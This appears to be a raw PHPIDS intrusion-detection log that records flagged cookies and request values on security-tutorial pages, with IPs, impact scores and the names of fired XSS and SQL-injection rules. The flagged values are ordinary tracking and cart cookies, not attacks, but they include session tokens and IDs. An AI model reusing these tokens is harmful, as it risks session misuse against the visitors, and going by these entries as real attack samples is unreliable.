Value:	urltoken=CFID#=1647409&CFTOKEN#=43458014&jsessionid#=3030dd227a70b528e33234624e2256436e7f#lastvisit={ts '2009-11-07 15:45:40'}#timecreated={ts '2009-11-07 07:03:18'}#hitcount=9#cftoken=43458014#cfid=1647409#
Page:	/i.php?page=videos%2Fndiff-nmap-5
IP:	78.46.48.165
Impact:	172
Created:	2009-11-07 17:37:44
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 3.1923076923077 Converted: ((((+::

ID:	59392
Name:	COOKIE.DB
Value:	msRandX=93&ItemDetailsBeta=Y&msProduct=1782427&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150C.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150C.jpg
Page:	/i.php?page=videos%2Fndiff-nmap-5
IP:	78.46.48.165
Impact:	172
Created:	2009-11-07 17:37:44
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30 Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:	59393
Name:	COOKIE.Cart
Value:	PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=5279858&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:	/i.php?page=videos%2Fndiff-nmap-5
IP:	78.46.48.165
Impact:	172
Created:	2009-11-07 17:37:44
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59394
Name:	COOKIE.RubricSession
Value:	U2FsdGVkX18iVFgMfh2HBpP0qjQM8QZMZmI6QA407kc=
Page:	/i.php?page=videos%2Fndiff-nmap-5
IP:	78.46.48.165
Impact:	172
Created:	2009-11-07 17:37:44
Details:	Impact: 7 | Tags: xss, csrf, id, rfe, lfi Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 2.7058823529412

ID:	59395
Name:	REQUEST.PREF
Value:	ID=20fd167e89c67864:TM=1257636027:LM=1257636027:S=W1-vw36YKGCtb4md
Page:	/i.php?page=security%2Fchangemac
IP:	78.46.34.48
Impact:	210
Created:	2009-11-07 17:37:44
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:	59396
Name:	REQUEST.language
Value:	--
Page:	/i.php?page=security%2Fchangemac
IP:	78.46.34.48
Impact:	210
Created:	2009-11-07 17:37:44
Details:	Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:	59397
Name:	REQUEST.IW
Value:	SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20354
Page:	/i.php?page=security%2Fchangemac
IP:	78.46.34.48
Impact:	210
Created:	2009-11-07 17:37:44
Details:	Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59398
Name:	REQUEST.Cart
Value:	PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=4938551&sku=H94-2502&SRCCODE=WEBRSS002&cm_mmc=RSS-_-TigerDirect-_-Carls-_-RSS
Page:	/i.php?page=security%2Fchangemac
IP:	78.46.34.48
Impact:	210
Created:	2009-11-07 17:37:44
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59399
Name:	REQUEST.DB
Value:	msRandX=14&ItemDetailsBeta=Y&msProduct=335878&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150A.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150A.jpg
Page:	/i.php?page=security%2Fchangemac
IP:	78.46.34.48
Impact:	210
Created:	2009-11-07 17:37:44
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30

ID:	59400
Name:	REQUEST.CommunityServer-UserCookie1001
Value:	lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=11/7/2009 8:48:57 AM
Page:	/i.php?page=security%2Fchangemac
IP:	78.46.34.48
Impact:	210
Created:	2009-11-07 17:37:44
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:	59401
Name:	REQUEST.CFGLOBALS
Value:	urltoken=CFID#=2643168&CFTOKEN#=abc9fcff707241ea-CEE85DF8-DD81-42FD-FA80CA5635295B63&jsessionid#=30309a9ac39d048b184830114813426bda49#lastvisit={ts '2009-11-07 15:45:29'}#timecreated={ts '2009-11-07 15:45:27'}#hitcount=4#cftoken=abc9fcff707241ea-CEE85DF8-DD81-42FD-FA80CA5635295B63#cfid=2643168#
Page:	/i.php?page=security%2Fchangemac
IP:	78.46.34.48
Impact:	210
Created:	2009-11-07 17:37:44
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 3.1923076923077 Converted: ((((+::

ID:	59402
Name:	REQUEST.exp_tracker
Value:	a:4:{i:0;s:55:"/workshops/How-to-prepare-for-FTA-negotiations-Part-II/";i:1;s:55:"/site/article/century-trends-in-victorian-temperatures/";i:2;s:56:"/blog/recession-special-5-great-sites-to-save-you-money/";i:3;s:54:"/apple/comment/sims-3-world-adventures-expansion-pack/";}
Page:	/i.php?page=security%2Fchangemac
IP:	78.46.34.48
Impact:	210
Created:	2009-11-07 17:37:44
Details:	Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:	59403
Name:	REQUEST.OAGEO
Value:	US||||||||||
Page:	/i.php?page=security%2Fchangemac
IP:	78.46.34.48
Impact:	210
Created:	2009-11-07 17:37:44
Details:	Description: Detects obfuscated JavaScript script injections | Tags: xss, csrf | ID: 25

ID:	59404
Name:	REQUEST.ci_session
Value:	a:4:{s:10:"session_id";s:32:"d4e45039be7ab5084d08928b6426a40e";s:10:"ip_address";s:11:"78.46.34.48";s:10:"user_agent";s:50:"Mozilla/5.0 (compatible; proximic; +http://www.pro";s:13:"last_activity";s:10:"1257671884";}2363a05e223f03e91d692312f294a5ce
Page:	/i.php?page=security%2Fchangemac
IP:	78.46.34.48
Impact:	210
Created:	2009-11-07 17:37:44
Details:	Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: --- Ratio: --- Converted: (((++:

ID:	59405
Name:	COOKIE.PREF
Value:	ID=20fd167e89c67864:TM=1257636027:LM=1257636027:S=W1-vw36YKGCtb4md
Page:	/i.php?page=security%2Fchangemac
IP:	78.46.34.48
Impact:	210
Created:	2009-11-07 17:37:44
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:	59406
Name:	COOKIE.language
Value:	--
Page:	/i.php?page=security%2Fchangemac
IP:	78.46.34.48
Impact:	210
Created:	2009-11-07 17:37:44
Details:	Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:	59407
Name:	COOKIE.IW
Value:	SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20354
Page:	/i.php?page=security%2Fchangemac
IP:	78.46.34.48
Impact:	210
Created:	2009-11-07 17:37:44
Details:	Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59408
Name:	COOKIE.Cart
Value:	PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=4938551&sku=H94-2502&SRCCODE=WEBRSS002&cm_mmc=RSS-_-TigerDirect-_-Carls-_-RSS
Page:	/i.php?page=security%2Fchangemac
IP:	78.46.34.48
Impact:	210
Created:	2009-11-07 17:37:44
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59409
Name:	COOKIE.DB
Value:	msRandX=14&ItemDetailsBeta=Y&msProduct=335878&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150A.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150A.jpg
Page:	/i.php?page=security%2Fchangemac
IP:	78.46.34.48
Impact:	210
Created:	2009-11-07 17:37:44
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30

ID:	59410
Name:	COOKIE.CommunityServer-UserCookie1001
Value:	lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=11/7/2009 8:48:57 AM
Page:	/i.php?page=security%2Fchangemac
IP:	78.46.34.48
Impact:	210
Created:	2009-11-07 17:37:44
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:	59411
Name:	COOKIE.CFGLOBALS
Value:	urltoken=CFID#=2643168&CFTOKEN#=abc9fcff707241ea-CEE85DF8-DD81-42FD-FA80CA5635295B63&jsessionid#=30309a9ac39d048b184830114813426bda49#lastvisit={ts '2009-11-07 15:45:29'}#timecreated={ts '2009-11-07 15:45:27'}#hitcount=4#cftoken=abc9fcff707241ea-CEE85DF8-DD81-42FD-FA80CA5635295B63#cfid=2643168#
Page:	/i.php?page=security%2Fchangemac
IP:	78.46.34.48
Impact:	210
Created:	2009-11-07 17:37:44
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 3.1923076923077 Converted: ((((+::

ID:	59412
Name:	COOKIE.exp_tracker
Value:	a:4:{i:0;s:55:"/workshops/How-to-prepare-for-FTA-negotiations-Part-II/";i:1;s:55:"/site/article/century-trends-in-victorian-temperatures/";i:2;s:56:"/blog/recession-special-5-great-sites-to-save-you-money/";i:3;s:54:"/apple/comment/sims-3-world-adventures-expansion-pack/";}
Page:	/i.php?page=security%2Fchangemac
IP:	78.46.34.48
Impact:	210
Created:	2009-11-07 17:37:44
Details:	Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:	59413
Name:	COOKIE.OAGEO
Value:	US||||||||||
Page:	/i.php?page=security%2Fchangemac
IP:	78.46.34.48
Impact:	210
Created:	2009-11-07 17:37:44
Details:	Description: Detects obfuscated JavaScript script injections | Tags: xss, csrf | ID: 25

ID:	59414
Name:	COOKIE.ci_session
Value:	a:4:{s:10:"session_id";s:32:"d4e45039be7ab5084d08928b6426a40e";s:10:"ip_address";s:11:"78.46.34.48";s:10:"user_agent";s:50:"Mozilla/5.0 (compatible; proximic; +http://www.pro";s:13:"last_activity";s:10:"1257671884";}2363a05e223f03e91d692312f294a5ce
Page:	/i.php?page=security%2Fchangemac
IP:	78.46.34.48
Impact:	210
Created:	2009-11-07 17:37:44
Details:	Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: --- Ratio: --- Converted: (((++:

ID:	59415
Name:	REQUEST.language
Value:	--
Page:	/i.php?page=security%2Fkon-boot-from-usb
IP:	213.239.213.230
Impact:	208
Created:	2009-11-07 17:37:44
Details:	Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:	59416
Name:	REQUEST.DB
Value:	msRandX=47&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:	/i.php?page=security%2Fkon-boot-from-usb
IP:	213.239.213.230
Impact:	208
Created:	2009-11-07 17:37:44
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30 Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:	59417
Name:	REQUEST.Cart
Value:	PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=3283217&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:	/i.php?page=security%2Fkon-boot-from-usb
IP:	213.239.213.230
Impact:	208
Created:	2009-11-07 17:37:44
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59418
Name:	REQUEST.cm__tracker
Value:	a:2:{i:0;s:36:"/gallery/entry/2910/venture-visuals/";i:1;s:36:"/gallery/entry/2903/finders-keepers/";}
Page:	/i.php?page=security%2Fkon-boot-from-usb
IP:	213.239.213.230
Impact:	208
Created:	2009-11-07 17:37:44
Details:	Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:	59419
Name:	REQUEST.IW
Value:	SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20134
Page:	/i.php?page=security%2Fkon-boot-from-usb
IP:	213.239.213.230
Impact:	208
Created:	2009-11-07 17:37:44
Details:	Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59420
Name:	REQUEST.exp_tracker
Value:	a:4:{i:0;s:53:"/weblog/artikel/Wordpress-mit-Readernaut-verheiraten/";i:1;s:55:"/events/detail/childrens-book-sale-september-12th-13th/";i:2;s:18:"/events/detail/p3/";i:3;s:43:"/don-irvine-blog/the-real-bias-is-moderate/";}
Page:	/i.php?page=security%2Fkon-boot-from-usb
IP:	213.239.213.230
Impact:	208
Created:	2009-11-07 17:37:44
Details:	Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:	59421
Name:	REQUEST.ecm
Value:	user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=instoresnow.walmart.com&SiteLanguage=1033
Page:	/i.php?page=security%2Fkon-boot-from-usb
IP:	213.239.213.230
Impact:	208
Created:	2009-11-07 17:37:44
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30

ID:	59422
Name:	REQUEST.CommunityServer-UserCookie1001
Value:	lv=1/1/1999 12:00:00 AM&mra=Sat, 07 Nov 2009 18:18:46 GMT
Page:	/i.php?page=security%2Fkon-boot-from-usb
IP:	213.239.213.230
Impact:	208
Created:	2009-11-07 17:37:44
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:	59423
Name:	REQUEST.CFGLOBALS
Value:	urltoken=CFID#=2033299&CFTOKEN#=14336522&jsessionid#=30304d576e822d946f6006e40437b6110e4f#lastvisit={ts '2009-11-07 19:50:17'}#timecreated={ts '2009-11-07 11:47:25'}#hitcount=16#cftoken=58611329#cfid=1658835#
Page:	/i.php?page=security%2Fkon-boot-from-usb
IP:	213.239.213.230
Impact:	208
Created:	2009-11-07 17:37:44
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 3.2307692307692 Converted: ((((+::

ID:	59424
Name:	COOKIE.language
Value:	--
Page:	/i.php?page=security%2Fkon-boot-from-usb
IP:	213.239.213.230
Impact:	208
Created:	2009-11-07 17:37:44
Details:	Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:	59425
Name:	COOKIE.DB
Value:	msRandX=47&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:	/i.php?page=security%2Fkon-boot-from-usb
IP:	213.239.213.230
Impact:	208
Created:	2009-11-07 17:37:44
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30 Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:	59426
Name:	COOKIE.Cart
Value:	PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=3283217&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:	/i.php?page=security%2Fkon-boot-from-usb
IP:	213.239.213.230
Impact:	208
Created:	2009-11-07 17:37:44
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59427
Name:	COOKIE.cm__tracker
Value:	a:2:{i:0;s:36:"/gallery/entry/2910/venture-visuals/";i:1;s:36:"/gallery/entry/2903/finders-keepers/";}
Page:	/i.php?page=security%2Fkon-boot-from-usb
IP:	213.239.213.230
Impact:	208
Created:	2009-11-07 17:37:44
Details:	Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:	59428
Name:	COOKIE.IW
Value:	SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20134
Page:	/i.php?page=security%2Fkon-boot-from-usb
IP:	213.239.213.230
Impact:	208
Created:	2009-11-07 17:37:44
Details:	Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59429
Name:	COOKIE.exp_tracker
Value:	a:4:{i:0;s:53:"/weblog/artikel/Wordpress-mit-Readernaut-verheiraten/";i:1;s:55:"/events/detail/childrens-book-sale-september-12th-13th/";i:2;s:18:"/events/detail/p3/";i:3;s:43:"/don-irvine-blog/the-real-bias-is-moderate/";}
Page:	/i.php?page=security%2Fkon-boot-from-usb
IP:	213.239.213.230
Impact:	208
Created:	2009-11-07 17:37:44
Details:	Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45